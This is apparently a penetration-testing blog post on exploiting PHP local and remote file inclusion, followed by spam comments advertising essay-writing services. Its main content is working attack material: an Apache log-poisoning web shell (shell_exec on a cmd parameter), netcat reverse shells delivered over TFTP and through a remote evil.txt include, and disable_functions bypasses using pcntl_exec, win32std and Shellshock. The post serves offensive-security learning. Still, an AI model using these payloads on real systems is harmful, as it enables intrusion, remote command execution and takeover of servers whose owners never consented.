2 minute read

LFI happens when an PHP page explicitly calls include function to embed another PHP page, which can be controlled by the attacker. For example, addguestbook.php below include another PHP page that can be chosen depending on the language input:

$lang = $_GET['LANG'];
include( $lang . '.php' );

Because the LANG field can be controlled, the attacker can put in the path to a local or remote file.

1. Local file inclusion (LFI)

a. Reading arbitrary files

Windows hosts file:

b. Contaminating apache log file and executing it

Use netcat to connect to the server and contaminate C:/xampp/apache/logs/access.log file:

root@kali:~# nc -v 80 inverse host lookup failed: Unknown host
(UNKNOWN) [] 80 (http) open
 <?php echo shell_exec($_GET['cmd']);?> 

After contamination, the access.log file on the serve is like this: - - [11/Mar/2018:11:24:17 -0400] “GET /addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig HTTP/1.1” 200 369 - - [11/Mar/2018:11:24:48 -0400] “ “ 400 366

Display the access.log file to execute the command:

c. Transferring netcat and obtaining reverse shell


mkdir /tftp 
atftpd --daemon --port 69 /tftp 
cp /usr/share/windows-binaries/nc.exe /tftp/ 


tftp -i get nc.exe
nc.exe -e cmd.exe 4444


nc -lvp 4444

Access this URL to open the shell Note:

python -c 'import pty; pty.spawn("/bin/sh")'

is used to get the TTY shell

2. Remote file inclusion (RFI)

Executing a command via a remote php page:

Content of /var/www/html/evil.txt:

<?php echo shell_exec("nc.exe 4444 -e cmd.exe") ?>

Most modern php configuration disallows remote file includes of http URIs. For example: xampp/apache/bin/php.ini

allow_url_fopen = Off
allow_url_include = Off

3. Bypass PHP disable_functions

The server admin can disable PHP command execution to enhance the security. In that case, we have to bypass it so that our LFI/RFI attack is meaningful.

a. Use PHP code to download file and list directory

function listDir($dir) {
    if ($handle = opendir($dir)) {
        while (false !== ($entry = readdir($handle))) {
            if ($entry != "." && $entry != "..")
                echo "$entry<br>";
function downloadFile($url, $path) {
    $file = fopen ($url, 'rb');
    if ($file) {
        $newf = fopen ($path, 'wb');
        if ($newf) {
                fwrite($newf, fread($file, 1024 * 8), 1024 * 8);

b. PHP 4.2.0+, PHP 5: pcntl_exec

$cmd = @$_REQUEST[cmd];
    die('pcntl not found');

$cmd = $cmd."&pkill -9 bash >out";
pcntl_exec("/bin/bash", $cmd);
echo file_get_contents("out");        

c. PHP 5.2.3: Win32std ext Protections Bypass

if (!extension_loaded("win32std")) die("win32std extension required!");
system("cmd.exe"); //just to be sure that protections work well

d. PHP 5.x: Shellshock

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
    if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
        $tmp = tempnam(".","data");
        putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
        mail("a@","","","","-bv"); // -bv so we don't actually send any mail
    else return "Not vuln (not bash)";
    $output = @file_get_contents($tmp);
    if($output != "") return $output;
    else return "No output, or not vuln.";

4. Deal with missing -e option in netcat

Certain nc version does not provide -e option for us to open a shell session. Workaround by using /bin/sh as below:

function reverse_shell() {
    echo "Disabled functions: " . ini_get('disable_functions')."\n";
    echo shellshock("mknod /tmp/backpipe p ");
    echo shellshock("/bin/sh -c '/bin/sh 0</tmp/backpipe | nc 4444 1>/tmp/backpipe'");



  • http://resources.infosecinstitute.com/local-file-inclusion-code-execution/
  • https://www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/
  • https://www.sunnyhoi.com/how-to-hack-a-website-using-local-file-inclusion-lfi/


  • http://pentestmonkey.net/blog/post-exploitation-without-a-tty
  • https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

Reverse shell:

  • https://highon.coffee/blog/reverse-shell-cheat-sheet/
  • https://netsec.ws/?p=331

PHP disable_functions

  • http://blog.safebuff.com/2016/05/06/disable-functions-bypass/

Netcat missing -e

  • https://pen-testing.sans.org/blog/2013/05/06/netcat-without-e-no-problem/





Commerce as a profession essay writing Study of the humanities essay writing Primary education essay writing Security of US borders and Illegal Immigration essay writing Democracy in our country essay writing <a href=https://academic365.site/>write movie reviews online</a> Youth movement essay writing Should you feel guilty about killing zombies Explain essay writing Your favorite poet essay writing The one-act play essay writing How do you propose to spend the long vacation essay writing The spirit of adventure essay writing The green revolution essay writing Nationalism essay writing Commerce as a profession essay writing Life is earnest life is real essay writing Describe the most important relationship in your life essay writing The college magazine essay writing Superstition essay writing Parliamentary democracy essay writing Planning for national reconstruction essay writing https://academic365.site/ professional writing online igcse exam results free term papers and essays writing prompts organic chemistry igcse

write movie reviews online

The choice of professions essay writing Journalism essay writing College sports essay writing If you were going to build the perfect shopping mall what would you include Why essay writing Literature and society essay writing <a href=https://academic365.site/>buy resumes online</a> Teaching children with learning disabilities essay writing The one-act play essay writing The problem of illiteracy in our country essay writing Violence in sport essay writing Peace hath her victories no less renowned than war essay writing Friendship essay writing A college debate essay writing Self-reliance essay writing Charity begins at home essay writing Types of comedy essay writing Romanticism and romantic poetry essay writing Primary education essay writing Why animal testing should be banned essay writing The sorrows and joys of life essay writing Reading as means of education essay writing https://academic365.site/ format for writing a resume reflective essay essay introduction examples how write curriculum vitae definition of essay

Leave a Comment

Your email address will not be published. Required fields are marked *